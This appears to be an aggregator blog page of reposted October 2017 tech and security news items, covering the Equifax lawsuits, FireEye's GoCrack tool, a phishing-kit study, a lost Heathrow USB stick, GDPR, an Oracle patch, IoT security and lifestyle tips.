Tuesday, October 31, 2017
Adequate Man There Is No Way Trump Knows The Lyrics To The National Anthem | Splinter That Weird Ana
Adequate Man There Is No Way Trump Knows The Lyrics To The National Anthem | Splinter That Weird Analogy About Beer and Tax Cuts Was Dumb as Hell | Jezebel Multiple People Dead After Driver Hits Pedestrians in New York City, Reports of Shots Fired [Updating] | The Root Why Some Black and Brown People Can’t Trust Bernie Sanders, in 1 Quote | Earther Heroic Man Liberates Fish Living Life in a Powerade Wrapper |
from Lifehacker http://ift.tt/2iiWqQV
This Inexpensive Front Pocket Wallet Gives You Easy Access to a Ton of Cards and Cash
I like small, front pocket wallets. I also like to carry a lot of cards, plus some cash. These two desires are usually in conflict, but the Strapo wallet (currently on Kickstarter) can satisfy both.
The front of Strapo features two quick-access slots for your most used cards, and the back has a sturdy elastic strap to hold cash, keys, and even coins without fear of them falling out. The star of the show here though is the top, which opens up to hold the rest of your cards. They say it can hold six, but I crammed 10 into the top of my demo unit. I definitely wouldn’t recommend more than that, but I’m a credit card hoarder, so I think most of you should be fine.
Advertisement
But how do you get those cards out, if they’re tucked all the way inside the wallet? With the strap(o), of course. Just pull on the little elastic tab at the top of the wallet, and the entire pile of cards pops out for you to grab.
For a limited time, you can preorder a Strapo for $23, or two for $39 (with some higher reward tiers available as well), with expected delivery in December.
from Lifehacker http://ift.tt/2iM1n8t
Equifax is facing a towering pile of class action law suits
Remember how deposed Equifax CEO Rick Smith got trotted around Capitol Hill to have his wrist metaphorically slapped by several congressional committees following what security journalist Brian Krebs so memorably referred to as the “dumpster fire” of a breach?
…and remember how we told you not to hold your breath with regards to real reform in the data brokerage industry? After all, in spite of congressional members saying that the company’s pre- and post-breach actions/inactions “smelled really bad,” there was zero talk of serving Equifax execs with subpoenas.
Well, subpoena time may have gotten yet another class-action lawsuit closer. If Washington isn’t going to slap some payback out of Equifax, then hopefully one or more of the 70+ class action lawsuits filed since the breach was disclosed on 7 September 2017 will do some good.
The law firm of Strimatter Kessler Whelan just filed another one: a national class action complaint (PDF) against Equifax in the US District Court of the Western District of Washington, in Seattle. The case is still in its early stages, but the law firm says it’s signed three named plaintiffs.
A woman who believes she’s one of the 140 million victims says her identity has been stolen 15 times since the breach.
Katie Van Fleet, of Seattle, says she’s received letters from stores including Kohl’s, Macy’s, Old Navy and Home Depot, thanking her for her credit applications. Nope, didn’t apply for any such, Van Fleet says. She and her Strimatter attorney, Catherine Fleming, believe that her personal data was stolen during the Equifax hack.
It’s a fine kettle of fish to be forced to deal with when you’re trying to buy a house, as is Van Fleet. What’s particularly galling is that neither she nor any of us have a choice about credit reporting agencies gobbling up our data, she says… and then disgorging it upon the internet:
I feel very helpless. I didn’t sign up to Equifax so I feel all of that stuff has been taken and I’m left here trying to sweep up the pieces and protect myself and protect my credit.
The Seattle suit is alleging that, among other things, Equifax…
- “Willfully, knowingly, callously, recklessly, and negligently” let hackers get at the personally identifying information (PII) of more than 100 million US citizens, green card holders and business customers without their prior express consent, and “without regard” for what would be done with the data.
- “Exploited the harm” done to the victims with an incident response site that offered the “deceptive promise” of one year of free credit monitoring by its wholly owned subsidiary, TrustedID, in exchange for users waiving their right to pursue legal action.
- Knew, or should have known, about the breach when it happened or soon thereafter, but three company execs cashed in almost $2 million worth of shares weeks before they told shareholders or affected consumers and business owners.
The suit alleges that Equifax is forcing people or businesses to give up the right to sue it but the company, given a good bit of grief over the issue, updated its policy on 11 September to state that:
…enrolling in the free credit file monitoring and identity theft protection products that we are offering as part of this cybersecurity incident does not prohibit consumers from taking legal action.
The suit alleges that it’s “unfair, deceptive and otherwise wrongful conduct under state and federal law” for Equifax to “[create] the illusion that Plaintiffs and other consumers may benefit” from the cash cow that is TrustedID.
Stritmatter has another term for Equifax’s TrustedID credit monitoring: it’s calling it “profiteering.”
No one should feel safe about this breach after one year. Typically, bad actors hold onto Personally Identifiable Information for a period of time with the intent of escaping the breach victim’s attention.
Indeed, bad actors can hold onto our PII for years: long enough for the Equifax breach, and the company’s jaw-dropping sloppiness before and after the breach, to fade from the headlines and from the collectively short attention span of Capitol Hill; long enough for some of us to get tired of the inconveniences of credit freezes and free up our credit so we can carry on with life as we take out mortgages, buy cars, apply for credit lines and so on.
If you’re thinking about joining a class action suit against Equifax, there are a few things to keep in mind.
For one, as pointed out by Consumer Reports, if you join a class action, alleging serious financial, physical, or other harm, you give up your right to sue a company on your own.
Keep in mind that proving an individual’s loss is going to be tough. Another proposed class-action lawsuit filed in Oregon accuses the company of negligence by failing to take appropriate measures to protect consumer data. It estimates billions of dollars in losses.
How much loss has any individual suffered? Well, that amounts to the grand total of $19.95 – the amount one of the Oregon plaintiffs paid for a third-party credit monitoring service after the breach was announced, according to the complaint.
Can anybody put a dollar sign on the amount of work and aggravation that somebody like Van Fleet has gone through to clean up her credit report and the onslaught of identity theft she’s suffered?
At this point, it’s up to lawyers, and the courts, to ascertain.
from Naked Security http://ift.tt/2A43atW
How to Find a Stud in Your Wall With Just a Magnet
If you’re doing some home renovation work or hanging something up, you’ll need to know where the studs in your walls are. But you don’t need a fancy stud finder device—a magnet will do just fine.
Most screws are magnetic, and screws are commonly used in home construction. So, the studs in your walls probably have some screws in them. In this video, youtuber Jaime S. shows you how you can find those screws—and thus find the stud—with a cheap magnet. Just move your magnet along the wall until the magnet gets drawn in and connects. Now you roughly know where the stud is, as well as where you shouldn’t drill or hammer directly (because there’s a screw right there).
Advertisement
Jaime uses a magnetic pick up stick to do this, which is designed to extend and pick up screws or other loose metal building materials, but you can also use a typical rare earth magnet if you already have one of those. The advantage of using the pick up stick, however, is you can extend the stick after placing the magnet on a stud and use it as a plumb bob. Now you can easily find the stud below the magnet as well.
Inexpensive Stud Finder Using a Magnet! | YouTube
from Lifehacker http://ift.tt/2iOmY0g
Attack on Old ANSI Random Number Generator
Almost 20 years ago, I wrote a paper that pointed to a potential flaw in the ANSI X9.17 RNG standard. Now, new research has found that the flaw exists in some implementations of the RNG standard.
Here's the research paper, the website -- complete with cute logo -- for the attack, and Matthew Green's excellent blog post on the research.
from Schneier on Security http://ift.tt/2iikBP7
FireEye releases open source managed password cracking tool
FireEye has released GoCrack, an open source tool for managing password cracking tasks across multiple machines.
“Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines,” Christopher Schmitt, a senior vulnerability engineer ar FireEye, explained.
GoCrack and its source code have been made available on GitHub.
Users can build it from source, or with the help of docker containers that build the necessary components for a successful install.
“We’re shipping with Dockerfile’s [sic] to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs,” Schmitt added.
Using GoCrack
The tool is expected to be of great help to red teams, which need to do things like test password effectiveness, develop better methods to securely store passwords, audit current password requirements, crack passwords on exfil archives, and so on.
User can create, view, and manage tasks through a simple web-based user interface:
“Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators,” Schmitt says.
“Engine files (files used by the cracking engine) such as Dictionaries, Mangling Rules, etc. can be uploaded as ‘Shared’, which allows other users to use them in task yet do not grant them the ability to download or edit. This allows for sensitive dictionaries to be used without enabling their contents to be viewed.”
GoCrack tasks’s wont function until engine files are uploaded.
“GoCrack is shipping with support for hashcat v3.6+, requires no external database server (via a flat file), and includes support for both LDAP and database backed authentication,” Schmitt notes.
They plan on adding support for MySQL and PostgreSQL database engines for larger deployments, the ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine.
from Help Net Security http://ift.tt/2z1IiDr
Jezebel Suspiciously Timed Arrest Warrant Issued for Rose McGowan Over Felony Drug Charge | Deadspin
Jezebel Suspiciously Timed Arrest Warrant Issued for Rose McGowan Over Felony Drug Charge | Deadspin The Broncos Might’ve Had Enough Of Trevor Siemian’s Terrible Picks | The Root Tomi Lahren’s Disrespectful Flag Costume Highlights the Hypocrisy of Whiteness | Splinter Old Man Shouts at TV | Earther Solar and Wind Energy Are Creating a Ton of Jobs |
from Lifehacker http://ift.tt/2xEGtLh
Researchers analyze 3,200 unique phishing kits
Most phishing sites are quickly detected and access to them is blocked, but not matter how fast the “takedown” happens, the number of victims is still large enough to make the phishers’ effort worthwhile.
That’s because the required effort is often minimal: access to compromised sites can be relatively cheaply bought (or phished), access to email accounts used to send out phishing mail is easy (new or compromised through phishing), and phishing kits are pretty easy to create and, generally, shared or sold at a bargain.
“To stand up a new phishing site, attackers first clone the legitimate site they want to spoof, then change the login form to point to a simple PHP script. The script collects credentials and either emails them to the attacker or logs them to a text file,” Jordan Wright, R&D Engineer at Duo Security, explains.
“Once the contents of the phishing site are created, they are bundled into a .zip file for reuse across multiple servers and phishing campaigns.”
These phishing kits are, in this form, easy to upload to a hacked site, where the files are unzipped into a directory. With the phishing page ready, the attackers can start sending out phishing emails pointing to it.
Analyzing phishing kits
Wright and his colleagues set out to analyze phishing kits left behind by lazy phishers on compromised websites/servers, so they trawled through sites hosting phishing URLs that have been submitted to Phishtank and OpenPhish.
After a month, they found 3,200 unique ones, and their analysis revealed that there is some kit reuse, even though it’s not as extensive as expected given that the whole point of phishing kits is to make it easy for attackers to reuse code across phishing sites.
They also found that only 11 percent of the compromised sites hosted multiple unique phishing kits, which means that either the same actor ran multiple campaigns simultaneously, or that multiple actors have compromised the same host.
The latter possibility should not come as a surprise, as many of the phishing kits they analyzed came with (hidden) backdoors.
“While we can’t attribute these particular kits we studied to a marketplace, there have been other smaller studies that indicate phishing kits can be bought for as little as $2 – $10,” Wright told Help Net Security.
Regardless of how these kits are obtained – be it sold, given away, or traded – attackers are obviously using them as an opportunity to reap the benefits of a compromised host without doing any of the work, he noted.
“The most common backdoor we came across when searching through our data set was access to the host. However, there have been reports of backdoors that use heavily obfuscated code to send harvested credentials to a separate attacker’s email address. These are harder to detect at scale since this obfuscation can vary across kits and would require more close analysis, which we consider a good next step for future work.”
Who’s creating and who’s using these kits?
The analyzed phishing kits are made to emulate most popular service providers, including email providers, social networks, financial services, and more.
“The surprising finding to us wasn’t that these service providers are being used, but rather that we could see clear ties between the email addresses for particular actors and multiple phishing kits spoofing different services. So you may have an actor who can be seen as connected to both a phishing kit spoofing an email provider as well as a phishing kit spoofing a social network,” Wright says.
He also pointed out that one of the most useful things we can learn from analyzing phishing kits is where credentials are being sent.
“By tracking email addresses found in phishing kits, we can correlate actors to specific campaigns and even specific kits. Not only can we see where credentials are sent, but we also see where credentials claim to be sent from. Creators of phishing kits commonly use the ‘From’ header like a signing card, letting us find multiple kits created by the same author.”
The rise of HTTPS phishing pages
Three of the top 10 paths in the researchers’ dataset indicate that phishing sites are hosted on compromised WordPress instances, but other sites using other content management systems are also targeted:
“Attackers looking to compromise unpatched, out-of-date systems frequently target widely-used content management systems. This is why it’s critical to keep such software up-to-date,” the researchers noted.
Another interesting finding is that over 16% of the recorded samples were served over HTTPS.
“This doesn’t indicate anything wrong with HTTPS, but security professionals will now need to adjust their recommendations for spotting phishing sites and reconsider how much trust is placed on the ‘secure’ indicator in the browser,” they noted.
Finally, many of the analyzed phishing kits come with a .htaccess file that blocks connections based on HTTP request attributes, and on the list of blocked IP ranges are those belonging to threat intelligence services like Abuse.ch, Phishtank, and Netcraft. The goal, of course, is to keep the phishing URLs working as long as possible.
from Help Net Security http://ift.tt/2iOn9sg
London Heathrow Airport’s security laid bare by one lost USB stick
If someone set out to invent a risky way to transport important data around it’s hard to imagine they’d better the USB flash stick for calamitous efficiency.
They’re cheap enough to feel disposable, store large numbers of files, and despite years of mishaps barely any are sold with encryption security.
They’re also incredibly popular – which is why in 2017 we’re still writing about cases like the USB stick found in a west London street that turned out to contain 2.5Gb of unprotected files detailing many of the anti-terrorism procedures and systems used to protect one of the world’s busiest airports.
This included: the route taken by the Queen, politicians and dignitaries when using the airport’s secure departure suite; radio codes used to indicate hijackings; details of maintenance and escape tunnels and CCTV locations; a timetable of police patrols; information of security ID cards; and details of the surveillance system used to monitor runways and the airport perimeter.
The only reason we know any of this is that the man who picked up the stick decided to report the discovery to a national newspaper, prompting the airport to launch a “very, very urgent” investigation.
Superficially, this resembles a good news story, a lucky escape that could have been so much worse.
Heathrow will ask the same questions as countless organisations before it: who copied the data and why? Did they have permission? Why wasn’t the stick secured?
The optimistic scenario is that someone unwisely decided to move a few files around and lost the USB stick in an act of carelessness. A more pessimistic possibility is that someone stole the data to order or to sell, which implies troubling things about network data security at Britain’s biggest airport.
The nature of the leaked information shows that USB stick incidents aren’t merely embarrassing, they can be extremely serious.
The lesson might be that in an era when employees can use more secure cloud storage, USB sticks should simply be banned. This has been tried, most notably by the US Department of Defense in 2008.
Mandating that sticks must be encrypted is another option, but this comes with the drawback that drivers are needed for every platform the drive might be plugged into (i.e. Mac and Linux machines as well as Windows).
Using sticks in this way also means organisations must invest in a provisioning system capable of tracking individual drives, resetting passwords, and remotely wiping data.
Even then, there’s still the small matter of making the sticks immune to more advanced cryptographic and physical tampering demanded by many compliance regimes, which for storage is governed by the US Government’s FIPS 140 levels 1-4. This involves a lot of testing and doesn’t come cheap.
We haven’t even mentioned the fact that USB sticks have a bad habit of picking up malware on their travels.
But let’s not fall into the trap of assuming that because USB sticks are somewhere between an expensive hassle and an outright grade one security risk, they can be quickly pensioned off.
Like it or not, they are inside every organisation by the bucket-load and won’t go away any time soon. As long as there are USB ports on computers to plug them into, they will be a problem.
From the fateful day the first USB sticks were plugged into computers by delighted employees in the late 1990s, securing them has been – at best – about containment. If only we’d known then what we know now.
from Naked Security http://ift.tt/2xE3JZJ
Troll gets 5 years for framing brother-in-law as terrorist and paedophile
A troll who launched what police called a “despicable” online smear campaign against his former brother-in-law, casting him as a paedophile and a would-be bomber, has been sentenced to more than five years in jail.
The Independent reports that 26-year-old Shohidul Islam, of Bradford, in the UK, “fell to pieces” when he couldn’t scrape together the £30,000 needed to bring his wife – Fahmida Parveen Shuba – and son over from Bangladesh.
It had been an arranged marriage. The couple wed in 2010, but she stayed in Bangladesh. Judge Rebecca Poulet QC last week told the court that Islam’s ex-wife had been “unhappy and afraid” of him at the time. By 2016, their relationship was over.
But Islam was not, evidently, through with his ex-wife or her family.
Acting out of revenge, Islam set up fake social media profiles in the name of Mohammed Razaul Karim – his ex-wife’s brother. Islam used those fake profiles to falsely paint Karim as an Islamic State supporter, somebody who was plotting bomb attacks, and as a child predator.
Islam used his brother-in-law’s photos to take out the fake accounts on Twitter, Facebook and YouTube. Then, he used the accounts to publish praise for previous terror attacks in the UK and showing support for the Islamic State.
Islam also used the imposter accounts to publish names and addresses of British soldiers, in an apparent call for others to target them in terror attacks. Posing as Karim’s uncle, he also filed a false report about Karim supposedly planning to detonate a “microwave bomb” at a primary school in Canning Town, east London.
According to the News & Star, Islam also framed Karim as a paedophile by creating a video using the fake social media profile on YouTube. The video was reportedly titled “Must watch child abuser, stay away from him” and included an image of Karim.
Prosecutor Mark Weekes told the court that the video alleged that Karim had been convicted of child abuse in his “home country”, in 2001 and suggested that he targets children online, has been arrested several times for child sex offenses and should be deported from the UK.
Weekes:
Needless to say, the allegation is entirely untrue.
Islam also made “pseudo indecent images of children” and sent them to Karim’s family. He also created a profile on the porn website X Videos and posted material to it in the name of Karim and his wife.
When police arrested Islam at a job centre in January 2016, they found a copy of the notorious Anarchist Cookbook on his mobile phone. First published in 1971, the book contains, amongst other things, instructions on making bombs and other weapons.
Islam initially denied the charges, but he changed his plea to guilty four days into his trial. He admitted to two counts of reckless encouragement of terrorism, possession of material useful to a terrorist, making a bomb hoax and making indecent images.
He was sentenced to five years and eight months jail time. Separate charges of making indecent images will be kept on file. He was also given a restraining order against further contact with Karim and his family.
The judge said that Karim, the target of the “wicked campaign”, was completely innocent but could have faced “dire consequences” had he come to the attention of authorities.
from Naked Security http://ift.tt/2hpQtSv
The clock is ticking on GDPR: Is your business ready?
Despite having almost two years to prepare for the General Data Protection Regulation (GDPR), there are companies across the globe that have done little, if anything, to avoid the hefty fines for non-compliance, despite being directly affected by the new law. In fact, businesses that fail to comply with the new standards for data collection and privacy by the May 2018 deadline could face fines of up to 4 percent of their annual revenue or 20 million euros, depending on which is higher.
A big reason for the lack of preparedness is a misunderstanding of what businesses will have to do to comply in the first place. While the legislation comes from the EU, businesses don’t have to be based or even have a point-of-presence in the Euro zone to face hefty fines. Any business, regardless of where it’s based, that has customers in the EU or collects private, personally identifiable information (PII) of EU residents are held to the same standards.
Who will be most affected by GDPR?
The fact of the matter is that there are very few businesses that contribute to the global economy that this new regulation won’t touch. Whether you are a small e-retailer that sells niche products to a select few customers in the EU or a global behemoth on the scale of Amazon, you’ll need to cross check your existing policies with the GDPR.
This is the biggest point of confusion for most businesses, as the GDPR doesn’t necessarily speak to data sovereignty so much as a business’ behavior and efficacy in providing the best protections. It emphasizes a point that many security experts have been harping on for years: data protection is an ongoing battle, not a matter of installing solutions once and expecting your problems to be resolved.
To drive this point home, Article 35 of the GDPR makes it mandatory for certain businesses to boost their manpower to assure defenses against data breaches are constantly being tested and bulked up.
Any organization collecting a subject’s genetic data, health information, racial or ethnic origin, or even religion will need to appoint an officer that can act as a dedicated point of contact for authorities monitoring compliance. This can’t just be any member of IT whose read up on the latest compliance standards, as Articles 36 and 37 explain in depth just who meets qualifications for these roles – generally, career enforcers with a history of dealing with authorities – as well as their responsibilities within the company.
What are the main sticking points?
Along with allocating manpower that will specifically be tasked with vetting these details to assure compliance, there are a few key points of the legislation that businesses will need to zero in on as a starting point. There are more than 91 articles within the GDPR spread across 11 chapters, making it a hefty document for IT to parse through.
Articles 23 and 30 are the areas of the legislation that should look the most familiar to teams already implementing data privacy protocols. Many of the measures here are relatively baseline in the context of the current cybersecurity climate, putting into law many of the practices that most businesses would have already needed to implement to succeed in a global market. These include implementing gateways to inspect web traffic that might be accessing or transmitting an organizations customer data, along with encryption that speaks to the latest security protocols – Transport Layer Security (TLS), for instance – most internet traffic adheres to.
The GDPR also goes to great lengths to give customers more control of their PII, especially information that gets automatically processed by services they do business with. Articles 17 and 18 dictate the “right to portability,” for instance, which allows subjects to transfer their PII between independent service providers with greater ease, as well as the “right to erasure,” where subjects can request that a business scrubs their PII from their data stores under certain extenuating circumstances.
The driving factor here is to give customers greater choice in the services they take advantage of, not beholding them to certain contracts that might be making their PII vulnerable to a data breach.
Data breaches specifically are discussed in Articles 31 and 32. The former holds businesses to a 72-hour deadline to alert customers who were subject to a personal data breach once the company uncovers the compromising incident. Article 32 takes this a step further by requiring data controllers waste no time in notifying compromised subjects, or else they could face immediate penalties and have a weakened defense should litigation take businesses to EU courts.
Article 79 is the guideline that all members of an organization need to keep top-of-mind, as it details the penalties for non-compliance; specifically, what kinds offenses warrant the intimidating 4-percent-revenue penalty mentioned above.
The good news for many businesses that have been dragging their feet is that a lot of the protocols that the GDPR makes law are already roundly considered best practice for any business taking part in the digital economy. Despite this, the GDPR protections are more wide-ranging than any preceding measures taken on a multi-national scale, so businesses need to be vehement in cross checking their existing security infrastructure with the GDPR to avoid penalties that no business can easily afford to stomach.
from Help Net Security http://ift.tt/2z65xyr
Oracle releases emergency Oracle Identity Manager patch
Oracle has issued an out-of-cycle patch that plugs a critical vulnerability (CVE-2017-10151), affecting Oracle Identity Manager, its widely-used enterprise identity management system that is part of the company’s Fusion Middleware offering.
“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert without delay,” the company said.
The vulnerability has been assigned CVSS v3 base score of 10.0, and can result in complete compromise of Oracle Identity Manager via an unauthenticated network attack. It is easily exploitable, and a successful attack requires no human interaction.
Supported affected versions of the product are: 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0, and 12.2.1.3.0.
“Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities,” Oracle said, and advised customers to upgrade to supported versions.
No additional, specific details about the flaw were shared, nor was the identity of the person(s) who discovered the flaw, or whether it is being actively exploited in the wild.
The October 2017 Oracle Critical Patch Update provided 40 new security fixes for Oracle Fusion Middleware. The next Oracle CPU is scheduled for 16 January 2018.
from Help Net Security http://ift.tt/2hpwfIB
Would you let Amazon unlock your door?
Amazon recently announced the launch of the Amazon Key, allowing the Amazon delivery person to open your door in order to place your package inside, where presumably it will be safe from theft, the weather, roaming wolf packs, bears, and general mishap.
Not all the commentary about this service (and associated camera, lock, etc.) have been positive. In fact, some has been rather negative or at least satirical.
Yes, of course there are concerns over security, privacy, and whether it’s really a good idea, generally, to let a corporation have access to your house. But, the adoption rate for this technology isn’t really the story here. Yes, of course, we should be careful with allowing a company to share control over our front door, although there’s no reason to think this particular technology is any less secure than any other smart door lock or that Amazon has anything nefarious in mind.
What matters here is that this is, yet, another salvo in the escalating war to win your home; a war that Amazon is currently winning, at least in volume of devices. This matters – not just to consumers, consumer advocates, and B-to-C business – to enterprise businesses, service providers, governments, and frankly anyone who uses the Internet.
While right now there’s a relatively clear line between work and home, that line is rapidly disappearing. Employers and employees alike are starting to expect far more seamless linkage between the availability of systems and data at work and the availability of the same services at home (and in the car, too).
Remember when BYOD was a thing? When people actually debated whether employees would be able to use their own phones, tablets, and laptops on the corporate network? While for some, highly secure environments, that’s still not an option, for most it’s simply a fact of life.
And, as homes get smarter and smarter, the pressure to see the home as a logical extension of the work network becomes greater. We’re not just talking about setting up a VPN from your laptop, either. As homes get smarter, and as more and more devices in them connect, the attack surface of your corporate network starts to expand at an accelerated, uncontrolled rate. As a result, whoever builds, owns, and manages the centralizing hub, around which the smart home is built, will matter – a lot – because their capacity to manage those devices, to oversee access to them, and to look for signs of attack, will become why organizations manage risk.
In the end, things like the Amazon Key aren’t about controlling access to the door, they’re about controlling access to the entire smart home. It’s not a point solution, instead it’s part of a grand strategy to become the de-facto technology around which the smart home of the next decade is built, and that smart home is going to be part of your corporate network, whether you like it or not.
A lot is riding on the security of this technology, and how willing the builders of smart homes, and smart home technology, are going to be to work with others to make that technology resilient to attack – attacks that will mount in severity over time. As smart homes become an extension of corporate networks (in the same way that smartphones already have), they will become the target of significant attack, up to and including nation-state sponsored attacks trying to penetrate enterprise networks.
If we can’t make this all work together, then the delivery guy opening the door won’t be the only person you have to worry about having more access than you would like.
from Help Net Security http://ift.tt/2gNSWoZ
Most organizations and consumers believe there is a need for IoT security regulation
90% of consumers lack confidence in the security of Internet of Things (IoT) devices. This comes as more than two-thirds of consumers and almost 80% of organizations support governments getting involved in setting IoT security, according to Gemalto.
“It’s clear that both consumers and businesses have serious concerns around IoT security and little confidence that IoT service providers and device manufacturers will be able to protect IoT devices and more importantly the integrity of the data created, stored and transmitted by these devices,” said Jason Hart, CTO, Data Protection at Gemalto. “With legislation like GDPR showing that governments are beginning to recognize the threats and long-lasting damage cyber-attacks can have on everyday lives, they now need to step up when it comes to IoT security. Until there is confidence in IoT amongst businesses and consumers, it won’t see mainstream adoption.”
The current state of play in IoT security
Consumers’ main fear (cited by two thirds of respondents) is hackers taking control of their device. In fact, this was more of a concern than their data being leaked (60%) and hackers accessing their personal information (54%). Despite more than half (54%) of consumers owning an IoT device (on average two), just 14% believe that they are extremely knowledgeable when it comes to the security of these devices, showing education is needed among both consumers and businesses.
In terms of the level of investment in security, the survey found that IoT device manufacturers and service providers spend just 11% of their total IoT budget on securing their IoT devices. The study found that these companies do recognize the importance of protecting devices and the data they generate or transfer with 50% of companies adopting a security by design approach.
Two-thirds (67%) of organizations report encryption as their main method of securing IoT assets with 62% encrypting the data as soon as it reaches their IoT device, while 59% as it leaves the device. Ninety two percent of companies also see an increase in sales or product usage after implementing IoT security measures.
Support for IoT security regulations gains traction
According to the survey, businesses are in favor of regulations to make it clear who is responsible for securing IoT devices and data at each stage of its journey (61%) and the implications of non- compliance (55%). In fact, almost every organization (96%) and consumer (90%) is looking for government-enforced IoT security regulation.
Lack of end-to-end capabilities leading to partnerships
Encouragingly, businesses are realizing that they need support in understanding IoT technology and are turning to partners to help, with cloud service providers (52%) and IoT service providers (50%) the favored options. When asked why, the top reason was a lack of expertise and skills (47%), followed by help in facilitating and speeding up their IoT deployment (46%).
While these partnerships may be benefiting businesses in adopting IoT, organizations admitted they don’t have complete control over the data that IoT products or services collect as it moves from partner to partner, potentially leaving it unprotected.
“The lack of knowledge among both the business and consumer worlds is quite worrying and it’s leading to gaps in the IoT ecosystem that hackers will exploit,” Hart continues. “Within this ecosystem, there are four groups involved – consumers, manufacturers, cloud service providers and third parties – all of which have a responsibility to protect the data. ‘Security by design’ is the most effective approach to mitigate against a breach. Furthermore, IoT devices are a portal to the wider network and failing to protect them is like leaving your door wide open for hackers to walk in. Until both sides increase their knowledge of how to protect themselves and adopt industry standard approaches, IoT will continue to be a treasure trove of opportunity for hackers.”
from Help Net Security http://ift.tt/2xDdlnv
Monday, October 30, 2017
Higher education CIOs expect business model change due to digital transformation
Higher education CIOs recognize that key organizational priorities are enrollment and student success, but fail to show innovation with regard to the top technologies required to differentiate themselves and win, according to a survey from Gartner. Yet, 59 percent of respondents think there will be significant business model change due to digital transformation.
Gartner’s 2018 CIO Agenda Survey gathered data from 3,160 CIO respondents in 98 countries and across major industries, including 247 higher education CIOs.
Higher education CIOs ranked digital business/digital transformation as the fifth most strategic business priority. However, when it comes to the top technology areas these institutions are investing in to differentiate themselves, digitalization/digital marketing ranks only eighth amongst higher education respondents, compared to second across all industries.
“This may be because higher education is among the least digitized industries,” said Jan-Martin Lowendahl, vice president and distinguished analyst at Gartner. “The average higher education institution has a large backlog of digital enablement before it can even can think about digital transformation.”
Nevertheless, CIOs in the sector need to start bridging the digital divide. “Considering that higher education is, in principle, an ‘information’ industry with huge digital potential compared to other industries, digitalization needs to become a top priority,” Lowendahl said.
Top business objectives
A third of respondents cite enrollment as their top business priority, making it the clear leader. The growing need to ensure academic quality by competing for the best and the brightest explains the second business priority, student success (22 percent). Enrollment and student success are both related to growth/market share, but only 14 percent of the respondents explicitly mention this as a top business objective, putting it in joint third place, alongside retention.
Top tech to win
In response to the question ‘which technology area do you think is most important to helping your business differentiate and win or is most crucial to achieving your organization’s mission?’ BI/analytics was a clear No. 1 with higher education sector CIOs. That enterprise resource planning (ERP) is the second most mentioned technology is more surprising, as higher education institutions, in general, have not had a good track record in using ERP to re-engineer the institutions’ operations and decision making. Rather, they “pave the cow paths” – in the words of one CIO – resulting in costly customization and little improvement.
Third-ranked customer relationship management (CRM) clearly supports enrollment and retention business objectives while fourth-ranked learning management systems (LMS) is similarly aligned with business priorities such as student experience and success.
Top new tech spending
The higher education list of “top tech areas for new spending” has no clear winner. Cyber/information security ranks first with 18 percent, but is followed closely by ERP with 16 percent and a cluster of other priorities that don’t mirror the “top tech to win” list.
Investment in cloud continues to be high as several core systems are modernized, including ERP, e-learning/LMS and student information systems (SIS). This shows that higher education institutions are far from finished investing in their learning environment and modernizing their core production systems.
Compared to the top new technology spending list for all survey respondents, one key thing stands out. New spending on digitalization/digital marketing is mentioned by 12 percent of respondents overall, but doesn’t appear at all on the higher education list, despite “digital” being fifth in top business priorities.
from Help Net Security http://ift.tt/2igOAan
Jezebel What Exactly Did Kevin Spacey Do on the Set of House of Cards?
Jezebel What Exactly Did Kevin Spacey Do on the Set of House of Cards? | Deadspin The Cavaliers Stink! | Very Smart Brothas We Need a Reset Button or Something for White People | Splinter What if ‘Lobbyist for Foreign Dictator’ Wasn’t a Job It Was OK to Have? | Earther The Now-Cancelled Puerto Rico Power Contract Was So Shady the FBI Is Investigating It |
from Lifehacker http://ift.tt/2luDKCu
Can ARM save the Internet of Things?
At last, a glimmer of hope that a company with industry clout might be about to impose order on flaky Internet of Things (IoT) security.
The saviour-in-waiting is ARM’s open source Platform Security Architecture (PSA), announced this week at the company’s TechCon show, a reference spec for which was promised for early 2018.
Terms like “architecture”, “framework” and “platform” can sound a bit abstract but the gist of the PSA is that it does a lot of difficult legwork for companies who fancy using ARM’s hardware to build their own IoT products and services.
Before designing anything, ARM’s engineers say they modelled likely attacks on different kinds of IoT devices before working out how to protect them.
For example, smart meters are a common IoT device vulnerable to remote attacks which, ARM reasons, can only be protected against by wrapping the meter in verified boot architecture (to stop firmware tampering), based on strong crypto, with a trust architecture to manage it.
What they’ve come up with is the open source “Trusted Firmware-M” designed to work with the company’s ARMv8-M processor architecture. This makes possible:
- A proper root of trust
- A protected crypto keystore
- Software isolation between trusted and untrusted processes
- A way of securely updating firmware
- Easy debugging down to chip level
- A reliable cryptographic random number generator
- On-chip acceleration to make crypto run smoothly
For smart meter developers, building this on their own would lie somewhere between technically complex and economically impossible, one reason why this sector has ended up riddled with security problems.
The most infamous example of where those security problems can lead was last year’s Mirai, a botnet built by hijacking appallingly-secured IoT devices such as routers and webcams.
One insecure webcam is a problem for its owner. Tens of thousands of insecure webcams, corralled into something with the power to launch disruptive DDoS attacks on well-known internet services, are a problem for all of us.
Things have become so bad that the US Congress has even roused itself to propose an Internet of Things Cybersecurity Improvement Act, as a way of enforcing basic standards on device and gateway makers before the crack of doom. Because it’s hard to make this mandatory, a labelling scheme might be needed to sort the wheat from the chaff.
Is the arrival of PSA the moment when things change?
It certainly has backing, including from Google’s Cloud, Microsoft Azure, Cisco and Vodafone, as well as a host of smaller device makers who probably already use ARM kit. Big-name endorsement is important because big names provide (or would like to provide) the platforms on which a growing number of IoT devices operate.
It will also make the security side of IoT development a lot cheaper and easier for device makers of all kinds who will be able to use it to solve myriad complex security problems they might once have ignored or under-estimated.
One slightly confusing issue is that ARM already has the Mbed OS (and Mbed Cloud), launched in 2014 to do something that sounds very similar to the PSA but running on the ARMv7-M architecture. Apparently, PSA doesn’t yet support it but will do so in the future.
